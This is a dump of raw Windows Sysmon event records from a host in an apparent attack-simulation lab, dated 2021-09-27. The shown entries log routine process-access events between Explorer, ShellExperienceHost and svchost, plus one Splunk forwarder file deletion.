09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}46323280C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001055885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}46323280C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001055882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}46323280C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001055881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.947{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.947{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.947{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.947{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.588{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.525{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E99702A124B9FC7EA2A373CCAA52BA,SHA256=B7B0A6EDA8FB74A4F408CD5E5E5BAA792D33EBD50EF7493FD4018C6CA2CF0722,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.322{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+1a8f31|C:\Windows\System32\TwinUI.dll+b7ad9|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.322{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+1a8f31|C:\Windows\System32\TwinUI.dll+b7ad9|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.322{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+1a8f31|C:\Windows\System32\TwinUI.dll+b7ad9|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.322{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7abb|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.322{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7abb|C:\Windows\System32\TwinUI.dll+b7a42|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.322{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f23cc|C:\Windows\System32\TwinUI.dll+b2d24|C:\Windows\System32\TwinUI.dll+aea6b|C:\Windows\System32\TwinUI.dll+cecda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D29-6151-8D00-00000000FD01}41364504C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 